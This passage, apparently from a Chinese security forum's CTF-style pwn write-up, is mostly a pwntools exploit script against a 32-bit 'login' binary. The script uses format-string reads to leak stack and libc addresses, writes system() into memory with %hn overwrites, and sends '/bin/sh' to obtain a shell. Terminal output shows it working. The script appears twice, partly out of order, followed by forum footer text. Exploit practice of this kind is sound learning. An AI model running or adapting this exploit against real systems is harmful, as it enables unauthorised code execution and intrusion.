libc_data
=
libc_main_addr
-
libc.symbols[
'__libc_start_main'
]
sys_addr
=
libc_data
+
libc.symbols[
'system'
]
#+0x480
#str_sh_addr=libc_data+libc.symbols['str_bin_sh']
str_bin_sh
=
libc.search(
"/bin/sh\x00"
).
next
()
sys_addr_0_2
=
int
(
str
(
hex
(sys_addr))[
6
:
10
],
16
)
sys_addr_2_4
=
int
(
str
(
hex
(sys_addr))[
2
:
6
],
16
)
stack_addr_0_2
=
int
(
str
(
hex
(stack_addr))[
6
:
10
],
16
)
print
"sys_addr=>"
,
hex
(sys_addr)
print
'sys_addr_0_2=>'
,
hex
(sys_addr_0_2)
print
'sys_addr_2_4=>'
,
hex
(sys_addr_2_4)
print
'stack_addr=>'
,
hex
(stack_addr)
print
'stack_addr_0_2=>'
,
hex
(stack_addr_0_2)
print
'libc_data=>'
,
hex
(libc_data)
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
-
12
,
6
))
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B014'
,
16
),
10
))
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
+
4
,
6
))
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B016'
,
16
),
10
))
'''
gdb.attach(p,'break *0x80485AF\nc')
pause()
'''
# in case sys_addr_2_4 < sys_addr_0_2 will fail
payload
=
'%'
+
str
(sys_addr_0_2)
+
'c%7$hn'
+
'%'
+
str
(sys_addr_2_4
-
sys_addr_0_2)
+
'c%11$hn'
p.sendafter(
'Try again!\n'
,payload)
p.sendafter(
'Try again!\n'
,
'/bin/sh\x00'
)
p.interactive()
from
pwn
import
*
#from LibcSearcher import LibcSearcher
#p=remote('108.160.139.79',9090)
p
=
process(
'./login'
)
elf
=
ELF(
'./login'
)
libc
=
ELF(
'/lib/i386-linux-gnu/libc.so.6'
)
#context.log_level="debug"
p.sendafter(
'your name: '
,
'ad'
)
payload1
=
'\n%6$p\n%15$p\n'
p.sendafter(
'Please input your password: \n'
,payload1)
def
DoubSzWt(number,deviation):
payload
=
'%'
+
str
(number)
+
'c%'
+
str
(deviation)
+
'$hn'
return
payload
p.recvuntil(
'0x'
)
stack_addr
=
int
(p.recv(
8
),
16
)
p.recvuntil(
'0x'
)
libc_main_addr
=
int
(p.recv(
8
),
16
)
-
247
print
"libc_main_addr=>"
,
hex
(libc_main_addr)
'''libc=LibcSearcher('__libc_start_main',libc_main_addr)'''
libc_data
=
libc_main_addr
-
libc.symbols[
'__libc_start_main'
]
sys_addr
=
libc_data
+
libc.symbols[
'system'
]
#+0x480
#str_sh_addr=libc_data+libc.symbols['str_bin_sh']
str_bin_sh
=
libc.search(
"/bin/sh\x00"
).
next
()
sys_addr_0_2
=
int
(
str
(
hex
(sys_addr))[
6
:
10
],
16
)
sys_addr_2_4
=
int
(
str
(
hex
(sys_addr))[
2
:
6
],
16
)
stack_addr_0_2
=
int
(
str
(
hex
(stack_addr))[
6
:
10
],
16
)
print
"sys_addr=>"
,
hex
(sys_addr)
print
'sys_addr_0_2=>'
,
hex
(sys_addr_0_2)
print
'sys_addr_2_4=>'
,
hex
(sys_addr_2_4)
print
'stack_addr=>'
,
hex
(stack_addr)
print
'stack_addr_0_2=>'
,
hex
(stack_addr_0_2)
print
'libc_data=>'
,
hex
(libc_data)
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
-
12
,
6
))
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B014'
,
16
),
10
))
p.sendafter(
'Try again!\n'
,DoubSzWt(stack_addr_0_2
+
4
,
6
))
p.sendafter(
'Try again!\n'
,DoubSzWt(
int
(
'B016'
,
16
),
10
))
'''
gdb.attach(p,'break *0x80485AF\nc')
pause()
'''
# in case sys_addr_2_4 < sys_addr_0_2 will fail
payload
=
'%'
+
str
(sys_addr_0_2)
+
'c%7$hn'
+
'%'
+
str
(sys_addr_2_4
-
sys_addr_0_2)
+
'c%11$hn'
p.sendafter(
'Try again!\n'
,payload)
p.sendafter(
'Try again!\n'
,
'/bin/sh\x00'
)
p.interactive()
dc@ubuntu:~
/
playground$ python payload_login.py
[
+
] Starting local process
'./login'
: pid
80372
[
*
]
'/home/dc/playground/login'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
[
*
]
'/lib/i386-linux-gnu/libc.so.6'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
libc_main_addr
=
>
0xf7df4550
sys_addr
=
>
0xf7e16db0
sys_addr_0_2
=
>
0x6db0
sys_addr_2_4
=
>
0xf7e1
stack_addr
=
>
0xff849c68
stack_addr_0_2
=
>
0x9c68
libc_data
=
>
0xf7ddc000
[
*
] Switching to interactive mode
sh:
1
: This:
not
found
$ whoami
dc
dc@ubuntu:~
/
playground$ python payload_login.py
[
+
] Starting local process
'./login'
: pid
80372
[
*
]
'/home/dc/playground/login'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (
0x8048000
)
[
*
]
'/lib/i386-linux-gnu/libc.so.6'
Arch: i386
-
32
-
little
RELRO: Partial RELRO
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2021-5-28 13:53
被顾言庭编辑
,原因:
赞赏记录
参与人
雪币
留言
时间
GUANZHI_
为你点赞~
2023-11-7 20:11
学计算机睡觉
为你点赞~
2023-6-4 17:34
一笑人间万事
为你点赞~
2022-7-27 01:06
心游尘世外
为你点赞~
2022-7-26 22:56
Youlor
为你点赞~
2022-7-17 11:39
飘零丶
为你点赞~
2022-7-17 02:30
赞赏
他的文章
- [原创][安全运维向]模拟搭建小型企业内网 14370
- 攻防世界-PWN-高手进阶区-难度3到4-全部题解 18981
- [原创]攻击格式化字符串在.bss段的程序(bugku-pwn6) 15325
- [原创]XCTF攻防世界-pwn新手练习区全部十题解析 14571
- [原创]KCTF2021 第二题 write up 5564
看原图
赞赏
雪币:
留言: